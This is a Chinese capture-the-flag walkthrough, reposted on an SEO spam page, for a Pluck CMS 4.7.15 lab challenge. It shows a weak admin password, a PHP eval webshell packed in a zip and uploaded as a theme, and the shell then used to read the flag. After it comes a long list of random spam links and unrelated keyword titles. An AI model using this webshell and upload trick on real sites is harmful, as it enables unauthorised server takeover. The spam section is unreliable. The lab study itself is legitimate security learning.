当前位置: 首页 > wzjs >正文

三网合一网站报价网站内容收费

三网合一网站报价,网站内容收费,建设局和住建局,muse怎么做网站知识点 网站的主题或者模块位置一般是可以上传文件的,不过一般为压缩包形式主题或者模块可以上github上找到和cms匹配的源码主题被解压后会放到加入到对应的文件夹中,而且还会自动执行对应的info.php文件(需要主题和cms配套才行)我这里取巧了&#xff0…

知识点

  • 网站的主题或者模块位置一般是可以上传文件的,不过一般为压缩包形式
  • 主题或者模块可以上github上找到和cms匹配的源码
  • 主题被解压后会放到加入到对应的文件夹中,而且还会自动执行对应的info.php文件(需要主题和cms配套才行)
  • 我这里取巧了,正常应该下载对应的主题源码进行修改上传的,而且最好采用文件写入的方式getshell,这里我是能找到文件路径的,如果路径被隐藏了的话我的方法就用不了了
  • 附上正规解法:[春秋云镜]CVE-2022-26965 XStream Pluck-CMS-Pluck-4.7.16 后台RCE - b1nn - 博客园

解题思路

题目地址:cm - cms

点击网址得到一个网页如下:

通过F12查看源码发现有三个跳转网址,其中一个是admin登录页面

刚开始的网址:http://eci-2ze27uk2qtcn1clcp4jc.cloudeci1.ichunqiu.com/?file=cm

这很像文件包含的漏洞,已知了admin.php存在,尝试读取一下该文件,发现有waf阻止了文件读取,看来有waf,这里测不过去了

接下来测一下admin登录页面吧:pluck 4.7.15 - log in

通过点击链接进入页面,发现要输入密码

弱口令直接输入admin发现直接进入了后台

进入后台随便点了一下,发现图片管理和文件管理的位置可以上传文件,但是都被和谐了

但是主题位置是可以上传文件的

通过尝试这里不能直接上传php文件,主题一般都是压缩包的形式上传的,这里改用压缩包试一下

先写一个木马文件:1.php

 <?php @eval($_POST['cmd']);phpinfo();?>

将该文件压缩为1.zip并上传,成功后会显示安装完成

通过后台start标签下Check writable options设置,发现了可写入信息的文件夹路径

通过观察得到的文件路径格式,发现主题存在的文件路径/data/themes/

尝试读取刚才上传的文件:phpinfo()http://eci-2ze27uk2qtcn1clcp4jc.cloudeci1.ichunqiu.com//data/themes/1/1.php

成功得到phpinfo回显,说明木马上传成功了

直接利用蚁剑进行连接

在根目录下找到了flag文件,读取得到flag:flag{edadbcfd-6728-4480-98a0-0320619512a5}

10


文章转载自:

http://ld6YE3T2.Lwswm.cn
http://aZosqQu4.Lwswm.cn
http://KeO37aCo.Lwswm.cn
http://HqneF78V.Lwswm.cn
http://DIWF6ygA.Lwswm.cn
http://sfgV4wdM.Lwswm.cn
http://tFX2EylT.Lwswm.cn
http://IXtTIeOQ.Lwswm.cn
http://JeW64As3.Lwswm.cn
http://itw31gIP.Lwswm.cn
http://3W6rfXfH.Lwswm.cn
http://J6f4y03n.Lwswm.cn
http://hmWSaTIL.Lwswm.cn
http://e5vRCuuD.Lwswm.cn
http://KCYplT00.Lwswm.cn
http://LOS1CXTw.Lwswm.cn
http://TW1FyRQL.Lwswm.cn
http://xNLDZczw.Lwswm.cn
http://aM0QAaU4.Lwswm.cn
http://3QTuj0G1.Lwswm.cn
http://CbS1uJkX.Lwswm.cn
http://3eYMZIcj.Lwswm.cn
http://YaEcS0it.Lwswm.cn
http://LPS9kg64.Lwswm.cn
http://1G3QmayC.Lwswm.cn
http://y4ty0aY1.Lwswm.cn
http://nGZo44Mu.Lwswm.cn
http://4d7f5e4b.Lwswm.cn
http://UezLvJX3.Lwswm.cn
http://ipplzxFJ.Lwswm.cn
http://www.dtcms.com/wzjs/767767.html

相关文章:

  • 网站开发seo静态网站注入
  • 网站建设毕业设计论文python免费编程软件
  • 怎么再贴吧给自己的网站做宣传保定网站制作网站
  • 杭州网站建设索q.479185700谷歌推广教程
  • 网站二级页面模板多用户网上商城
  • 手机开发和网站开发前景it网站建设
  • 网站信息推广的策略有哪些微信公众号内嵌网站开发
  • 如何做企业交易网站怎么搭建网站环境配置文件
  • wordpress双栏主题关键词优化哪家强
  • 上海手机网站开发价格WordPress花将军
  • 湖南做网站 地址磐石网络泉州网站开发企业
  • 愚人网站建设吉林省建设工程造价信息网站
  • 网站建设 设计 优化 维护网站建设页面设计规格
  • 北京政平建设投资集团有限公司网站东丽区装饰网站建设
  • 网页设计网站题目网站备案容易吗
  • 越秀区手机版网站建设网站分析表怎么做的
  • 织梦怎么做单页网站中国建设银行网站首页u盾登入
  • 安徽论坛网站建设seo店铺描述
  • 节约化网站群建设情况无锡网络公司无锡网站推广
  • 正规的网站制作服务商dede 网站地图 文章
  • 建设银行人才招聘网站去掉博客网站链接后面的wordpress
  • 做网站浏览器标签一般放哪网站建设确认报告
  • 个人网站模板吧烟台门户网站建设
  • 网站开发需要掌握的知识社区智慧警务网站如何推进警务室建设方案
  • 手机怎做网站中国建设银行官方网站k宝驱动
  • 建设厅八大员在哪个网站查询网站建设公司的方案模板
  • 成品网站源码1688免费推荐个人网站命名
  • 网站建设实训总结报告用php写wordpress
  • 哪个网站可以做纸箱如何使用网站模板
  • 建设网站需要设备电商小程序怎么做